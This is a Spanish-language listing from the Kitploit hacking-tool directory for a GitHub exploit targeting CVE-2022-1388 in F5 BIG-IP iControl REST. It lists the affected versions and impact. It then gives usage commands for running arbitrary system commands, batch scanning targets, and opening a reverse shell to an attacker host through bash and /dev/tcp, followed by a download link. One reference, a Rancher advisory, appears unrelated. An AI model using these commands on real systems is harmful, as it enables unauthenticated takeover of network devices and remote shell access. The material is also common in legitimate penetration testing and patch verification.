Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-1388 — CVE-2022-1388 F5 BIG-IP iControl REST RCE | Kitploit
Herramientas/GitHubGitHub/al1ex/cve-2022-1388
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubal1ex/cve-2022-1388

CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST RCE

Ver Repositorio
3712hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Impacto de la vulnerabilidad

Esta vulnerabilidad puede permitir que un atacante no autenticado con acceso de red al sistema BIG-IP a través del puerto de administración y/o las direcciones IP propias ejecute comandos arbitrarios del sistema, cree o elimine archivos, o deshabilite servicios.

Producto afectado

  • F5 BIG-IQ 11.6.1 - 11.6.5
  • F5 BIG-IP 12.1.0 - 12.1.6
  • F5 BIG-IP 13.1.0 - 13.1.4
  • F5 BIG-IP 14.1.0 - 14.1.4
  • F5 BIG-IP 15.1.0 - 15.1.5
  • F5 BIG-IP 16.1.0 - 16.1.2

Verificación de vulnerabilidad

Uso básico

root@kitploit:~
python3 CVE_2022_1388.py

uso

Verificación de vulnerabilidad

root@kitploit:~
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

verificar

Ejecución de comandos:

root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

ejecución_comando

root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

ejecución_2

Escaneo por lotes

root@kitploit:~
python3 CVE_2022_1388.py -s true -f check.txt

escaneo_lote

Shell inversa

root@kitploit:~
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

shell_inversa

shell_inversa_ok

Referencias

https://support.f5.com/csp/article/K23605346

https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw

https://twitter.com/jas502n/status/1523611433938059265

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388

https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr

Descargar herramienta